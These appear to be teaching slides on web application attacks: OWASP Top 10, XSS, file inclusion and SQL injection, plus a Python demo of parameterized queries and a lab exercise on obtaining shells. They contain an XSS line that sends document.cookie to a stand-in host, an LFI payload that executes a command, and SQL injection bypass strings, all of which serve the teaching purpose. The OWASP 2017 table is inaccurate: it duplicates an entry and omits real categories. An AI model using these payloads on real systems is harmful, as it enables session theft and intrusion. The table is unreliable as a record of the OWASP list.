**Slide 1: Web Application Attacks**

- **Web applications** can be written in various languages, each with its specific vulnerability classes.
- Main attack vectors are similar in concept.
- OWASP promotes security awareness and solutions for web application development.

**Slide 2: OWASP Top-10 Security Risks**

| Risk | Description |
| --- | --- |
| A1:2017 - Injection | Attacker can add malicious SQL, NoSQL, or command strings. |
| A2:2017 - Broken Authentication | Compromised credentials, weak defaults, or exposed keys. |
| A3:2017 - Sensitive Data Exposure | Unprotected data at rest or in transit. |
| A4:2017 - XML External Entity (XXE) | Attacker can exploit parsing of XML outside the standard. |
| A5:2017 - Security Misconfiguration | Default configurations, open cloud storage, misconfigured HTTP headers. |
| A6:2017 - Using Components with Known Vulnerabilities | Outdated or vulnerable libraries and frameworks. |
| A7:2017 - Insufficient Logging & Monitoring | Lack of logging and monitoring prevents detection of attacks. |
| A8:2017 - Insecure Deserialization | Vulnerable deserialization can lead to remote code execution. |
| A9:2017 - Using Known Vulnerable Components without Patching | Outdated software with known vulnerabilities. |
| A10:2017 - Insufficient Transport Layer Protection | Weak or no encryption, allowing man-in-the-middle attacks. |

**Slide 3: Cross-Site Scripting (XSS)**

- Unsanitized user input displayed as HTML.
- Allows malicious scripts to run in the victim's browser.
- Reflected (non-persistent): the injected script runs immediately when the victim clicks the crafted link.
- Stored (persistent): the web application stores the payload and delivers it to the victim; the script runs when the page is viewed.
- Impact: cookie stealing, authentication bypass, redirection.

**Slide 4: XSS Example**

- Reflected XSS (vulnerable page: the `name` parameter is echoed into the HTML without encoding):

```php
<h1>XSS demo</h1>
<?php /* the 'name' query parameter is echoed without HTML encoding */ ?>
<?php echo "Hello " . $_GET['name']; ?>
```

- Stored XSS (a payload saved by the application and served to every user who views it):

```html
<script>alert(1)</script>
```

**Slide 5: Cookie Stealing via XSS**

- JavaScript can make the victim's browser send its cookies to the attacker:

```javascript
new Image().src="http://example.com/bogus.php?output="+document.cookie;
```

**Slide 6: File Inclusion Vulnerabilities**

- Local File Inclusion (LFI) and Remote File Inclusion (RFI):
  - LFI: includes local files from the server's filesystem.
  - RFI: introduces the attacker's own code to the web server by including a remote file.
- Whether the exploit works depends on the PHP version and the web server configuration.

**Slide 7: LFI Demonstration**

- Unsanitized `lang` parameter:

```php
<?php /* 'lang' comes unchecked from the query string and is passed straight to include */ ?>
<?php $lang = $_GET['lang']; include $lang . ".php"; ?>
```

- Payload:

```text
../uploads/avatars/image.jpg%00&cmd=ifconfig
```

**Slide 8: SQL Injection**

- Unsanitized user input passed to a database query.
- Manipulating the input can change the nature of the query.
- Examples:
  - Bypassing authentication with `' OR '1'='1`
  - Extracting data using `' union select * from information_schema.columns --`
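
As an added example (not part of the original slides), the following Python script shows why the `' OR '1'='1` bypass above works and how bound parameters defeat it: a constructed in-memory SQLite table with one user, a login check that concatenates the input into the SQL text, and the same check written with `?` placeholders. The table, column names and sample credentials are constructed for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory demo database: one user row, sample credentials only."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def build_vulnerable_sql(username, password):
    """String concatenation: the input is spliced into the SQL text, so quotes in
    it change the query's structure. Returned separately so it can be inspected."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    """Authentication check that executes the concatenated query."""
    return db.execute(build_vulnerable_sql(username, password)).fetchone() is not None


def login_parameterized(db, username, password):
    """Hardened check: '?' placeholders bind the input as data, never as SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


def compare(username, password):
    """Run both checks on the same credentials and report the outcome of each."""
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, username, password),
        "parameterized": login_parameterized(db, username, password),
    }


if __name__ == "__main__":
    payload = "' OR '1'='1"
    # With the slide's payload the WHERE clause becomes
    #   username = '' OR '1'='1' AND password = '' OR '1'='1'
    # and the trailing OR '1'='1' makes it true for every row.
    print(build_vulnerable_sql(payload, payload))
    print("slide payload:", compare(payload, payload))
    print("valid login:  ", compare("alice", "s3cret"))
    print("wrong secret: ", compare("alice", "guess"))
```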

**Exercise:**

- Using the OWASP Broken Web Applications project, demonstrate obtaining a shell with:
  - An LFI vulnerability in the web application with file upload.
  - An LFI vulnerability in the web application with contaminated logs.
  - An RFI vulnerability in the web application.
- Demonstrate attacks using SQL injection and Cross-Site Scripting (XSS).
- Provide documentation and proof of useful attacks in your report.